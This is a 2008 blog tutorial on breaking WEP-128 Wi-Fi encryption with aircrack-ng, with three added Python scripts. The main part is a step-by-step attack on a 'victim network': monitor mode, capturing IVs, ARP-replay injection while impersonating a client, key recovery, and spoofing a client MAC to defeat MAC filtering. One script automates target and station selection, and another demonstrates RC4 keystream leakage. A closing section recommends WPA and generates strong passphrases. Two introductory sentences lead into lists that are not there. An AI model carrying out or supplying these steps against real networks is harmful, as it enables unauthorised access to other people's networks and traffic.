
WEP is not a protection

What is WEP and why you should not use it


It can be cracked in minutes!

I am talking about WEP-128 here, the most common version and the "more secure" variant compared to WEP-64. "More secure" in quotes, because WEP-128 takes a few minutes to crack and WEP-64 a few seconds. Something that falls this easily cannot be called a protection scheme; it has little to do with encryption and nothing to do with privacy. Whoever uses WEP is inviting people into what is effectively an open network.

For those who want to verify what I write here, my equipment is the following:

Any other wireless LAN adapter works too. Injection support is a great help: without it you have to wait for the network's own traffic, which is far slower than generating traffic yourself. I will explain that below.

Putting the adapter in monitoring mode

Perhaps the most difficult step is putting your wireless adapter into monitor mode. The default mode is called managed: in this mode the adapter is connected to one single network. In monitor mode it listens to everything in the air.

aircrack-ng comes with airmon-ng, a utility that puts most cards into monitor mode. It is used like this:

# airmon-ng start <your-wireless-interface>

I will use the tools that come with the madwifi-ng driver instead. Usually my wireless LAN interface is already created as a managed device (here: ath0, on the physical device wifi0), so I have to destroy it first and recreate it as a monitor device. Here is how it is done:

# wlanconfig ath0 destroy
# wlanconfig ath1 create wlandev wifi0 wlanmode monitor

That's it. We now listen to everything. Check with ifconfig -a that the device has really been created as ath1; it may have received a higher numeric suffix. I will use ath1 here.

Choosing the victim network

The next step is to start airodump-ng to listen for all interesting networks. This is really easy:

# airodump-ng -t WEP -t OPN ath1

If there are WEP networks around, you will get output similar to this. It is taken from the manpage, by the way, so do not worry about the exposed MAC and BSSID addresses.

 CH  7 ][ BAT: 2 hours 10 mins ][ 2006-03-28 21:00

 BSSID              PWR  Beacons   # IV  CH  MB  ENC  ESSID

 00:13:10:30:24:9C   46       15   3416   6  54. WEP  the ssid
 00:09:5B:1F:44:10   36       54      0  11  11  OPN  NETGEAR

 BSSID              STATION            PWR  Packets  Probes

 00:13:10:30:24:9C  00:09:5B:EB:C5:2B   48      719  the ssid
 00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190       17  the ssid

The access points are listed at the top of the screen, sorted by activity. They may disappear from the screen if no packets from them reach your laptop. The number of beacons should increment constantly; that means you are near the access point and the signal quality is good. Walk around with your laptop to improve the PWR score.

You can see two access points here. One is called "the ssid" and the other "NETGEAR". Open networks do not need to be cracked, they are already open, unless the traffic on them is protected by something else such as IPsec. Many open networks are "protected" only by MAC address restrictions, which is no protection at all. See below.

Let's try the WEP one. Note the BSSID address on the left and the channel number 6; you will need both to make the crack efficient. You also see two clients with their MAC addresses (column STATION) using the WEP network "the ssid". Lucky!
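Picking the target by hand works for two networks; with a screen full of them it helps to do what the paragraph above describes programmatically: find the WEP networks that have associated stations, take the busiest one, and derive the follow-up commands. The following Python script is an added example, not part of the original page or of aircrack-ng. It parses the screen output exactly as shown above (the sample text is the manpage output from the page) and chooses the station with the most packets as the client to impersonate later:

```python
import re
from collections import defaultdict

# Screen output of airodump-ng as shown on the page (manpage sample); used as test input.
SAMPLE = """\
 CH  7 ][ BAT: 2 hours 10 mins ][ 2006-03-28 21:00

 BSSID              PWR  Beacons   # IV  CH  MB  ENC  ESSID

 00:13:10:30:24:9C   46       15   3416   6  54. WEP  the ssid
 00:09:5B:1F:44:10   36       54      0  11  11  OPN  NETGEAR

 BSSID              STATION            PWR  Packets  Probes

 00:13:10:30:24:9C  00:09:5B:EB:C5:2B   48      719  the ssid
 00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190       17  the ssid
"""

MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"

# Access-point row: BSSID PWR Beacons #IV CH MB ENC ESSID (the ESSID may contain spaces).
AP_LINE = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<beacons>\d+)\s+(?P<ivs>\d+)"
    rf"\s+(?P<ch>\d+)\s+(?P<mb>\S+)\s+(?P<enc>\S+)\s+(?P<essid>.*?)\s*$",
    re.I,
)
# Station row: BSSID STATION PWR Packets Probes. A station row never matches AP_LINE,
# because its second column is a MAC address, not a number.
STA_LINE = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<station>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<packets>\d+)",
    re.I,
)


def parse_airodump(text):
    """Return ({bssid: ap_info}, {bssid: [(station_mac, packets), ...]})."""
    aps, stations = {}, defaultdict(list)
    for line in text.splitlines():
        m = AP_LINE.match(line)
        if m:
            aps[m["bssid"]] = {
                "essid": m["essid"],
                "channel": int(m["ch"]),
                "ivs": int(m["ivs"]),
                "enc": m["enc"].upper(),
                "pwr": int(m["pwr"]),
            }
            continue
        m = STA_LINE.match(line)
        if m:
            stations[m["bssid"]].append((m["station"], int(m["packets"])))
    return aps, stations


def pick_wep_target(text, iface="<iface>"):
    """Choose the WEP network with associated clients and the most IVs so far,
    plus its most talkative station, and build the airodump/aireplay commands."""
    aps, stations = parse_airodump(text)
    candidates = [(b, a) for b, a in aps.items() if a["enc"] == "WEP" and stations.get(b)]
    if not candidates:
        return None  # nothing crackable with ARP replay: no WEP net with a live client
    bssid, ap = max(candidates, key=lambda c: c[1]["ivs"])
    station = max(stations[bssid], key=lambda s: s[1])[0]
    return {
        "bssid": bssid,
        "channel": ap["channel"],
        "essid": ap["essid"],
        "station": station,
        "airodump": f"airodump-ng --channel {ap['channel']} --bssid {bssid} -w capture {iface}",
        "aireplay": f"aireplay-ng --arpreplay -b {bssid} -h {station} -r capture-01.cap {iface}",
    }


if __name__ == "__main__":
    for key, value in pick_wep_target(SAMPLE, "ath1").items():
        print(f"{key:9} {value}")
```

The two command strings it prints are the ones used in the next sections; the interface name is a parameter because it depends on your driver (ath1 for the madwifi-ng setup above).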

Start sniffing

Stop airodump-ng by pressing Ctrl+C and restart it with the following parameters:

# airodump-ng --channel 6 --bssid 00:13:10:30:24:9C -w capture ath1

Now we capture the packets of this one network to a file called capture-01.cap (airodump-ng appends a counter to the prefix given with -w). You need to capture about 70000 to 80000 IVs to crack most networks. You do not need to stop airodump-ng to find out whether you have captured enough IVs; the cracker reads the growing file.
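Why is the crack a matter of collecting IVs at all? WEP builds the RC4 key for every frame from a 24-bit IV, sent in the clear, followed by the shared secret (40 bits for WEP-64, 104 bits for WEP-128), and every data frame starts with the same LLC/SNAP header, so the first keystream bytes of every frame are known to the listener. The FMS, KoreK and PTW attacks in aircrack-ng turn many such (IV, keystream prefix) pairs into the secret key, which is why more IVs means a faster crack. The Python below is an added example, not the page's or aircrack-ng's code and not the PTW attack itself: it implements WEP encryption as specified (RC4 over IV||secret, CRC-32 ICV, key-index byte left out) and shows the two cheap consequences: known-plaintext keystream recovery per IV, and plaintext leakage when the 24-bit IV repeats, which the birthday bound puts at a few thousand frames. The key and payloads are constructed.

```python
import struct
import zlib
from math import pi, sqrt


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by the keystream generator (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(secret: bytes, iv: bytes, payload: bytes) -> bytes:
    """Encrypted WEP body: IV in the clear, then RC4_{IV||secret}(payload || ICV).
    The real frame also carries a key-index byte after the IV; it is omitted here."""
    assert len(iv) == 3 and len(secret) in (5, 13), "24-bit IV, 40- or 104-bit secret"
    return iv + xor(payload + icv(payload), rc4(iv + secret, len(payload) + 4))


def wep_decrypt(secret: bytes, body: bytes):
    """Return (payload, icv_ok). A receiver only checks the CRC, nothing else."""
    iv, ct = body[:3], body[3:]
    pt = xor(ct, rc4(iv + secret, len(ct)))
    payload = pt[:-4]
    return payload, icv(payload) == pt[-4:]


# Every WEP data frame starts with this LLC/SNAP header, so the first six
# plaintext bytes of every frame are known before decryption.
SNAP = bytes.fromhex("aaaa03000000")


def keystream_from_frame(body: bytes, known: bytes = SNAP) -> bytes:
    """Known plaintext XOR ciphertext = the first keystream bytes for this frame's IV.
    Collecting these pairs for many IVs is the raw material of the FMS/KoreK/PTW attacks."""
    return xor(body[3:3 + len(known)], known)


def same_iv_leak(body1: bytes, body2: bytes) -> bytes:
    """Two frames under the same IV share the keystream, so XORing the ciphertexts
    cancels it and leaves plaintext1 XOR plaintext2."""
    assert body1[:3] == body2[:3], "frames must share an IV"
    n = min(len(body1), len(body2)) - 3
    return xor(body1[3:3 + n], body2[3:3 + n])


def expected_frames_until_iv_reuse(iv_bits: int = 24) -> float:
    """Birthday bound: roughly sqrt(pi/2 * 2^bits) random IVs before the first repeat."""
    return sqrt(pi / 2 * 2 ** iv_bits)


if __name__ == "__main__":
    secret = bytes.fromhex("0123456789abcdef0123456789")  # constructed WEP-128 key (104 bits)
    iv = b"\x00\x01\x02"                                   # constructed IV, reused on purpose
    p1 = SNAP + b"\x08\x06" + b"ARP who-has 192.168.0.1?"    # constructed payloads
    p2 = SNAP + b"\x08\x00" + b"GET /index.html HTTP/1.0"
    f1, f2 = wep_encrypt(secret, iv, p1), wep_encrypt(secret, iv, p2)
    print("decrypts to:", wep_decrypt(secret, f1))
    print("keystream prefix for this IV:", keystream_from_frame(f1).hex())
    print("p1 XOR p2 leaked by IV reuse:", same_iv_leak(f1, f2).hex())
    print("frames until an IV repeats: ~%d" % expected_frames_until_iv_reuse())
```

The leaked XOR starts with six zero bytes (both frames begin with the SNAP header) and then reveals, byte for byte, where the two payloads differ; with one plaintext guessed, the other follows. This is the part an attacker gets for free; the statistical key recovery on top of it is what aircrack-ng adds.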

Packet injection for a faster crack

We will assume that IVs are not arriving fast enough and you are getting bored watching the display. Two things are needed to speed up the crack:

Given both, you can re-inject packets that you have already captured. The access point accepts them because they are correctly encrypted, and, most importantly, it reacts to them: a replayed ARP request is re-broadcast by the access point and answered by the addressed station, each time under a fresh IV. You need to be within transmission range for this. If the signal (PWR) is too weak, you cannot send and receive reliably and, worse, you may capture corrupted packets that make the crack ineffective.

So let's start the injection to produce IVs! You need another utility from the aircrack-ng package: aireplay-ng.

# aireplay-ng --arpreplay -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B -r capture-01.cap ath1

Start this command in a second terminal. The -b parameter is the BSSID of the wireless network. The -h parameter is the MAC address of the client I pretend to be while injecting; I chose the most talkative station. aireplay-ng picks ARP requests out of the traffic and re-injects them into the victim network; with -r it takes them from the capture file that airodump-ng constantly writes to.

When everything works, you will see the IV counter rising at a very high rate. That is what we want. We need at least 70000 of them. Take your time and let it climb; this is a matter of a few minutes.

Cracking the WEP key

Keep both utilities injecting and capturing, and try to crack the WEP key whenever you think you have enough. Start this command in a third terminal (keep the other tools running!):

# aircrack-ng -z capture-01.cap

With the -z option (the PTW attack) a successful crack usually takes seconds; if there are not enough IVs yet, aircrack-ng aborts the attempt and waits for more, re-reading the growing capture file. Without -z the older FMS/KoreK attacks are used, which take much longer and often need well over 70000 IVs. I haven't had the case where -z did not work, yet.

A successful crack prints the WEP key in hexadecimal next to "KEY FOUND!" together with a probability of 100%.

I have the password and cannot connect!

There are several reasons why connecting to a WEP network can fail. Let's set the obvious ones aside:

There is one more. Some people think that restricting their access point to certain MAC addresses protects them. They are wrong!

Well, remember what we did above. We actually have their MAC addresses and even used them already to inject ARP packets.

Defeating the MAC "protection"

If an access point is "protected" by this mechanism, simply set your wireless adapter to the MAC address of one of the victim's clients. Most drivers only accept a new address while the interface is down, so take it down first and bring it up again afterwards:

# ifconfig <your-wireless-interface> hw ether <the-mac-you-want>

You should now be able to associate almost instantly. The only thing to watch is the real client: if it is still active with the same address, both of you will see erratic behaviour, so prefer a station that has gone quiet.

Alternatives to WEP

As you can see, WEP is not secure at all. That is why I recommend using WPA instead of WEP everywhere. If your client has no WPA-capable driver, get one quickly; I showed you above why.

When you switch to WPA-PSK, as most people do, use a strong passphrase: one that cannot be looked up in any dictionary. Random strings or random hexadecimal digits are best. Note that aircrack-ng can also attack a WPA-PSK network, and all it needs is one capture of the four-way handshake, which is exchanged whenever a client associates with the access point, for example when it is switched on. Once the handshake is captured, the guessing happens offline and nothing on your network can notice or slow it down.

Scary. But with a strong passphrase, guessing it is practically impossible. aircrack-ng tests hundreds to thousands of passphrases per second against a captured handshake, enough to exhaust any word list within hours, so take it seriously! I have a long dictionary here!

Choosing a strong password

Passwords

There are several tools for this. I recommend apg, which produces good passwords, even pronounceable ones if you want to memorize them more easily.

If you are really paranoid and do not trust your own random number generator, you can use dice and Diceware. This is not software: you throw dice and look up a word per throw in a long list. You get long, strong passphrases that are really easy to remember.
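For those who would rather script it than throw dice, the following Python is an added example (not from the page, apg or Diceware): it generates the three kinds of WPA-PSK secret discussed above with the operating system's CSPRNG, checks them against the limits WPA actually imposes (8 to 63 printable ASCII characters, or exactly 64 hex digits for the raw 256-bit key), and computes how many bits of guessing work each one costs. The eight-word list is a constructed stand-in for the real Diceware list of 6^5 = 7776 words; the entropy figures are computed for the real list size.

```python
import math
import secrets
import string

# Constructed stand-in for a Diceware list; a real list has 6**5 = 7776 entries.
DEMO_WORDS = ["amber", "basalt", "cinder", "dune", "ember", "fjord", "glacier", "harbor"]
DICEWARE_LIST_SIZE = 6 ** 5


def random_hex_psk() -> str:
    """64 hex digits: the raw 256-bit PSK that WPA accepts directly. Nothing to look up."""
    return secrets.token_hex(32)


def random_passphrase(length: int = 20, alphabet: str = string.ascii_letters + string.digits) -> str:
    """Random printable passphrase inside WPA's 8..63 character window."""
    if not 8 <= length <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def diceware_phrase(words, n_words: int = 6, sep: str = " ") -> str:
    """Diceware-style phrase: each word is an independent uniform pick.
    secrets.choice replaces the dice; the module random would not be acceptable here."""
    return sep.join(secrets.choice(words) for _ in range(n_words))


def entropy_bits(choices: int, picks: int) -> float:
    """Guessing work for `picks` independent uniform picks out of `choices` alternatives."""
    return picks * math.log2(choices)


def is_valid_wpa_psk(p: str) -> bool:
    """WPA-PSK rule: exactly 64 hex digits (raw key) or 8..63 printable ASCII characters."""
    if len(p) == 64:
        return all(c in string.hexdigits for c in p)
    return 8 <= len(p) <= 63 and all(32 <= ord(c) <= 126 for c in p)


if __name__ == "__main__":
    for label, value, bits in [
        ("raw hex PSK ", random_hex_psk(), 256),
        ("20 alnum    ", random_passphrase(20), entropy_bits(62, 20)),
        ("6 dice words", diceware_phrase(DEMO_WORDS), entropy_bits(DICEWARE_LIST_SIZE, 6)),
    ]:
        print(f"{label} {value!r:70} valid={is_valid_wpa_psk(value)} ~{bits:.0f} bits")
```

Six real Diceware words give about 77 bits and twenty random alphanumerics about 119; both are far beyond what dictionary attacks on a handshake can reach, and the raw hex key sidesteps the dictionary entirely. The phrase built from the eight-word demo list is of course only 18 bits and is there to show the mechanics, not to be used.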


m8d.de, 2008